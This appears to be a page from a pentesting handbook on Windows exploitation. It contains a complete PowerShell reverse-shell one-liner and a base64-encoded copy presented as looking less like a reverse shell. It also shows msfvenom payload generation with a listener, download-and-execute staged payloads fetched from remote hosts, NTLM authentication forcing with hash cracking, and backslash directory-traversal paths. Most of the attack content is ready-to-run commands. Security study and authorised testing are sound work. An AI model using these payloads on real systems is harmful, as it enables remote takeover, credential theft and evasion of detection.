# Exploitation
## Shells
### Powershell encoded Reverse
A reverse shell sends a connection back to an attacker, from which they can execute commands on the target interactively. In PowerShell, this can be done by creating a TCP socket, receiving a command, and then sending back the output.
A short implementation of this is [revshells.com - PowerShell #3 (Base64)](https://www.revshells.com/). It uses the following payload and replaces the `$IP` and `$PORT` with your server:
{% code title="Payload" overflow="wrap" %}
```powershell
$client = New-Object System.Net.Sockets.TCPClient("$IP",$PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
{% endcode %}
[This CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=Encode_text\('UTF-16LE%20\(1200\)'\)To_Base64\('A-Za-z0-9%2B/%3D'\)Find_/_Replace\(%7B'option':'Regex','string':'.*'%7D,'powershell%20-e%20$%26',false,false,false,true\)) can be used to convert the above command into an *encoded* payload, looking way less like a reverse shell and containing fewer special characters:
{% code title="Encoded Payload" %}
```
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAJABJAFAAIgAsACQAUABPAFIAVAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
```
{% endcode %}
{% hint style="info" %}
For testing or forensics, here is also a [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=From_Base64\('A-Za-z0-9%2B/%3D',true,false\)Decode_text\('UTF-16LE%20\(1200\)'\)Syntax_highlighter\('powershell'\)) that *decodes* an encoded payload.
{% endhint %}
### MSFVenom (`.exe`)
[The Metasploit Framework](https://www.metasploit.com/) has a collection of tools that work together, one of which is `msfvenom`. This command generates payloads in various formats that do certain things, often resulting in a shell for the attacker. You can list them all, but here are some of the most useful ones:
$ msfvenom -l payloads
...
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
windows/shell/reverse_tcp Spawn a piped command shell (staged). Connect back
to the attacker
windows/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter
shell. Requires Windows XP SP2 or newer.
* `windows/shell_reverse_tcp` -> This is one of the only shells that doesn't require MSF, all it does is spawn an interactive CMD shell and connect back to your port, which may be a simple netcat listener using `nc -lnvp 1337`.
* `windows/shell/reverse_tcp` -> The staged variant of the above, which requires MSF to send a second stage actually containing the shell functionality.
* `windows/meterpreter_reverse_https` -> A fancier shell that sends a 'meterpreter' payload, which only MSF can handle. This has some more features and the `_https` variant even encrypts all traffic going back and forth making it hard to analyze.
Generate payloads using the `msfvenom` command, and `-p` to choose them by name. After this, you can fill in variables like `LHOST` and `LPORT` to tell the payload where your listener will be, and finally use `-f` to choose a format and `-o` where to place it.
{% code title="Generate .exe payload" overflow="wrap" %}
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 -f exe -o payload.exe
```
{% endcode %}
For the last two, you require setting up a matching handler in `msfconsole`:
$ msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Payload options (windows/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 1337
msf6 exploit(multi/handler) > run
[-] Handler failed to bind to 10.10.10.10:1337:- -
[*] Started reverse TCP handler on 0.0.0.0:1337
[*] Command shell session 1 opened (10.10.10.10:1337 -> 10.10.10.10:2515)
Shell Banner:
-----
C:\Windows> whoami
WORKSTATION\user
See [metasploit](https://book.jorianwoltjer.com/windows/metasploit "mention") to learn more about how to use the Metasploit framework to find and run exploits.
### Download + IEX PowerCat
If your payload needs to be small, a solution is just to download the whole payload later, and evaluate it. These are known as "staged payloads" and one way to do this is by using [powercat](https://github.com/besimorhino/powercat). This is a PowerShell script that can let you easily create a reverse shell. Simply download [powercat.ps1](https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1) and host it yourself if the target does not have an internet connection. Then all that's left is to download and evaluate the script to connect with a simple command:
{% code title="Attacker's Machine" %}
```shell-session
$ python3 -m http.server # Set up the HTTP server with powercat.ps1 inside
$ nc -lnvp 1337 # Set up the reverse shell listener
```
{% endcode %}
{% code title="Payload" %}
```powershell
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/powercat.ps1');
powercat -c 10.10.10.10 -p 1337 -e powershell
```
{% endcode %}
After this payload fires, you should get a request on your HTTP server from the target downloading your file, and a little later a reverse shell on your 2nd listener as well.
### Fully Interactive Shell
A nice small addition you can add to your reverse shell listener is `rlwrap`, which wraps the `nc` listener using readline allowing you to **use arrow keys** for command history and editing:
```bash
rlwrap nc -lnvp 1337
```
The next level is tab completion, which requires a special shell on the target machine that connects to a netcat listener with `stty` set up. The following script can make such a clean connection:
{% embed url="" %}
Start a fully-interactive TTY reverse shell for tab completion and other interactive commands
{% endembed %}
{% code title="Attacker: listener" %}
```bash
stty raw -echo; (stty size; cat) | nc -lvnp 1337
```
{% endcode %}
{% code title="Target: payload" %}
```powershell
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing);
Invoke-ConPtyShell $LHOST 1337
```
{% endcode %}
## Forcing Authentication to Relay
When a client authenticates with a service using [ntlm](https://book.jorianwoltjer.com/windows/windows-authentication/ntlm "mention"), a challenge-response mechanism is used to verify if the user knows their password without sending it over the network. If a victim authenticates with a malicious server set up by the attacker, the response to a challenge the attacker gives is based on the user's password and no other unknown factors. That means we can also then **brute-force** the associated password offline.
We can force such an authentication by, for example, making them request a share like `\\10.10.10.10\share`, or a *file* on a share with `\\10.10.10.10\share\file`. This will then make an authentication to your IP address, which you can abuse.
{% hint style="info" %}
Requesting an IP address will force NTLM authentication, using a hostname chooses Kerberos instead!
{% endhint %}
Using a tool like [Responder](https://github.com/lgandx/Responder) you can send them a challenge, which they will solve and give you back the answer allowing the password to be brute-forced:
The long **Hash** value can then be put into a file to be cracked with tools like [#hashcat](https://book.jorianwoltjer.com/cryptography/hashing/cracking-hashes#hashcat "mention"):
```bash
hashcat -m 5600 responder.hash /list/rockyou.txt
```
See [#pass-the-challenge-ntlm-relay](https://book.jorianwoltjer.com/lateral-movement#pass-the-challenge-ntlm-relay "mention") for a more advanced technique where we relay the challenge to a different service to access it as the victim.
## Web tricks
Due to some Windows quirks, the actions that websites perform behind the scenes might behave differently than on Linux. This chapter collects a few of these tricks that can often be abused because developers forget about them.
### Slashes (`/` vs `\`)
Directory Traversal vulnerabilities are quite common, where you use the special `..` sequence in a path to go up one directory, and then access a file/folder that's outside the regular allowed area. On Linux this is often done like so:
{% code title="Linux directory traversal" %}
```
/var/www/html/uploads/ + ../../../../etc/passwd = /etc/passwd
```
{% endcode %}
Because of this most path accesses block or replace `/` characters from the string. On Windows systems, this is not enough, however, as the main directory separator is a backslash (`\`) instead.
{% code title="Windows with backslash" %}
```
C:\inetpub\wwwroot\uploads\ + ..\..\..\Windows\win.ini = C:\Windows\win.ini
```
{% endcode %}
Pretty often the Windows APIs even allow interchangeable use of them, resulting in payloads containing mixed forward and backward shashes.
A good fuzzing list containing many of these techniques can be found here:
### ISS Short filenames (SFNs, 8.3 filenames)
Back in the DOS versions of Windows, filenames could only first 8 characters as their name and 3 characters as their extension. No more. Because of Windows's backward compatibility standards, all files actually still follow this rule. But nowadays longer filenames are allowed with just an alias stored as an 8.3 short filename (SFN) if it doesn't fit, for example:
Some filenames that don't fit the 8.3 format and have gotten aliases in red, while fitting ones are in blue
An Internet Information Services (IIS) webserver running on the machine might actually interpret these SFNs and give you back the content of the larger file. This can be incredibly useful for directory/filename brute-forcing because any giant path can be found this way by just guessing its short name. Read the following article to understand how we can efficiently guess these names:
{% embed url="" %}
Tools such as [shortscan](https://github.com/bitquark/shortscan) implement clever techniques to find all possible short filenames and print if the service is vulnerable:
$ shortscan http://example.org/
Shortscan v0.6 ยท an IIS short filename enumeration tool by bitquark
Target: http://example.org/
Running: EOS (vny/044E) [!]
Vulnerable: No (or no 8.3 files exist)
